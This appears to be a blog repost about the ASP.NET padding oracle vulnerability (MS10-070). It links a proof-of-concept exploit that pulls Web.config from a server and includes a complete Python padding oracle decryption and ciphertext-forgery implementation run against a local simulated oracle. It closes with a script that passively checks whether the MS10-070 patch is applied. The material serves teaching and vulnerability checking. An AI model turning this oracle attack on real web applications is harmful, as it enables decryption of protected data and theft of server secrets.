ASP.NET Padding Oracle Attack

Exploitation on Linux
Video: http://vimeo.com/15856549
This proof-of-concept exploit performs a padding oracle attack against a simple ASP.NET application (any ASP.NET application will do) to download a file from the remote web server. In this example the proof-of-concept exploit downloads the Web.config file.

The proof-of-concept exploit (a Ruby script) can be found at ampliasecurity.com/research/aspx_po_chotext_attack.rb
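What such an exploit does under the hood, as an added worked example (this is neither the Amplia Security exploit nor the check script further down, and it goes a step beyond the text by showing both directions of the attack): a CBC padding oracle is modelled as a local function that answers only "padding valid / invalid", the way the vulnerable handlers did through their error responses; decrypt_with_oracle recovers a ciphertext one byte at a time, and encrypt_with_oracle forges a ciphertext for a plaintext of the attacker's choosing (CBC-R), the building block a chosen-text attack like the PoC relies on. The block cipher is an assumed stand-in (a small HMAC-based Feistel network) so the code runs on the standard library alone; all function names, the key and the secret/chosen strings are constructed for this example.

```python
import hashlib
import hmac
import secrets

BLOCK = 8                                     # 64-bit blocks, like the 3DES of the unpatched handlers
HALF = BLOCK // 2
ENC, DEC = range(4), range(3, -1, -1)         # round order for encryption / decryption

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in block cipher: a 4-round Feistel network keyed with HMAC-SHA256 (an
# assumption, so the example runs offline on the standard library). The attack
# never looks inside it; any block cipher used in CBC mode is equally affected.
def _feistel(key, blk, rounds):
    l, r = blk[:HALF], blk[HALF:]
    for rnd in rounds:
        l, r = r, _xor(l, hmac.new(key, bytes([rnd]) + r, hashlib.sha256).digest()[:HALF])
    return r + l                              # final swap: decrypting is the same network, rounds reversed

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = _feistel(key, _xor(padded[i:i + BLOCK], prev), ENC)
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(_xor(_feistel(key, c, DEC), p) for p, c in zip(blocks, blocks[1:]))

def make_oracle(key):
    """The server side: all the attacker ever learns is 'padding valid or not'."""
    def oracle(iv, ct):
        oracle.queries += 1
        try:
            pkcs7_unpad(cbc_decrypt(key, iv, ct))
            return True
        except ValueError:
            return False
    oracle.queries = 0
    return oracle

def recover_intermediate(oracle, block):
    """Recover D_key(block) from the last byte backwards, using only the oracle."""
    inter = bytearray(BLOCK)
    for i in range(BLOCK - 1, -1, -1):
        pad = BLOCK - i
        probe = bytearray(BLOCK)
        for j in range(i + 1, BLOCK):         # bytes already known are set so they decrypt to `pad`
            probe[j] = inter[j] ^ pad
        for guess in range(256):
            probe[i] = guess
            if not oracle(bytes(probe), block):
                continue
            if i == BLOCK - 1:
                # A hit on the last byte may really be a longer valid padding (02 02, ...);
                # disturbing the byte before it breaks that case but not a genuine 01.
                probe[i - 1] ^= 0xFF
                still_ok = oracle(bytes(probe), block)
                probe[i - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[i] = guess ^ pad
            break
        else:
            raise RuntimeError("no padding accepted: this is not a padding oracle")
    return bytes(inter)

def decrypt_with_oracle(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return pkcs7_unpad(b"".join(_xor(recover_intermediate(oracle, c), p)
                                for p, c in zip(blocks, blocks[1:])))

def encrypt_with_oracle(oracle, plaintext):
    """CBC-R: forge a ciphertext for a chosen plaintext without the key, last block first."""
    padded = pkcs7_pad(plaintext)
    chain = [secrets.token_bytes(BLOCK)]      # any value serves as the final ciphertext block
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        chain.insert(0, _xor(recover_intermediate(oracle, chain[0]), padded[i:i + BLOCK]))
    return chain[0], b"".join(chain[1:])      # (iv, ciphertext)

def demo(secret=b"constructed secret: Pwd=hunter2", chosen=b"chosen text"):
    key, iv = secrets.token_bytes(16), secrets.token_bytes(BLOCK)   # unknown to the attacker
    oracle = make_oracle(key)
    recovered = decrypt_with_oracle(oracle, iv, cbc_encrypt(key, iv, pkcs7_pad(secret)))
    forged_iv, forged_ct = encrypt_with_oracle(oracle, chosen)
    forged = pkcs7_unpad(cbc_decrypt(key, forged_iv, forged_ct))
    return recovered, forged, oracle.queries
```

Calling demo() returns the recovered secret, the plaintext the server obtains from the forged ciphertext, and the number of oracle queries spent: on average about 128 calls per recovered byte, so the cost grows linearly with the ciphertext length. Against a real application the oracle function is an HTTP request whose response (status code, error page, timing) reveals whether the padding was accepted.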

#!/usr/bin/env python
#
# PoC for checking if MS10-070 patch is applied by providing a .NET
# application ScriptResource or WebResource resource handler's 'd' block
#
# Credits go to:
#
# * Juliano Rizzo - for the amazing research and hints about the remote
# passive check
# <http://twitter.com/julianor/status/26419702099>
#
# * Brian Holyfield - for his tool to exploit Padding Oracle attacks in a
# generic and easy way
# <https://www.gdssecurity.com/l/t/d.php?k=PadBuster>
#
# * Giorgio Fedon - for initial Perl version of this check
# <http://blog.mindedsecurity.com/2010/09/investigating-net-padding-oracle.html>
#
# * Alejo Murillo Moya - for testing and ideas
#
#
# Copyright (c) 2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
#
#
# Example of unpatched system:
#
# * /WebResource.axd?d=kHoDoPikaYfoTe1m9Ol5iQ2
# * /ScriptResource.axd?d=2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10
#
# Examples of patched system:
#
# * /WebResource.axd?d=VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0
# * /ScriptResource.axd?d=Gcb5Zt1XkIPHAYC3l5vZ4QidrZMKISjkqnMQRQDqRD88oxkWIL1kNBQThGrDJBbaKqPd9AyT-jF1EhM-rame5NXv7RLQRhtlz-xfoQlHXf_pjgiBJW7ntGxhegohUeNFlo9x8_RMU6ocDmwwK6dfIRDFbX01

import base64
import binascii
import sys


def base64decode(string):
    return base64.b64decode(string)


def hexdecode(string):
    # Helper kept from the original tool set (not used by main); accepts an
    # optional 0x prefix, e.g. "0x41" -> b"A"
    string = string.lower()

    if string.startswith("0x"):
        string = string[2:]

    return binascii.unhexlify(string)


def hexencode(data):
    # Helper kept from the original tool set (not used by main)
    return binascii.hexlify(data).decode("ascii")


def dotNetUrlTokenDecode(string):
    r"""
    Decode a .NET HttpServerUtility.UrlTokenEncode string: URL-safe base64
    ('-' and '_' instead of '+' and '/') with the '=' padding stripped and
    its count appended as a trailing digit.

    Ported from padbuster v0.3 by Brian Holyfield:

    sub web64Decode {
        my ($input, $net) = @_;
        # net: 0=No Padding Number, 1=Padding (NetUrlToken)
        $input =~ s/\-/\+/g;
        $input =~ s/\_/\//g;
        if ($net == 1)
        {
            my $count = chop($input);
            $input = $input.("=" x int($count));
        }
        return decode_base64($input);
    }
    """

    string = string.replace("-", "+").replace("_", "/")
    count = string[-1]

    if count.isdigit():
        string = string[:-1] + ("=" * int(count))

    return base64decode(string)


def usage():
    print("""
Use:

./ms10-070_check.py <encrypted_d_block>

Note:

Encrypted 'd' block MUST be from ScriptResource.axd or WebResource.axd.
Parse the application response body to find a valid one.

Examples:

With ScriptResource.axd 'd' block:
$ ./ms10-070_check.py 2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10
Your application is VULNERABLE, patch against MS10-070

With WebResource.axd 'd' block:
$ ./ms10-070_check.py VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0
Your application is NOT vulnerable
""")


def main():
    if len(sys.argv) < 2:
        usage()
        sys.exit(1)

    # An unpatched handler emits the raw block-cipher output, whose length is
    # a multiple of 8 bytes (3DES and AES blocks are 8 and 16 bytes). The
    # MS10-070 update appends a signature to the ciphertext, so the decoded
    # length is no longer a multiple of 8 (60 bytes in the patched
    # WebResource.axd example above). This is a passive heuristic on a single
    # token: confirm with an active padding-oracle probe before relying on it.
    if len(dotNetUrlTokenDecode(sys.argv[1])) % 8 == 0:
        print("Your application is VULNERABLE, patch against MS10-070")
    else:
        print("Your application is NOT vulnerable")


if __name__ == '__main__':
    main()

Note:

Copies must clearly credit the source: Blog - Hacking

Copyright © 123 H4ck' Blog. Powered by Blogger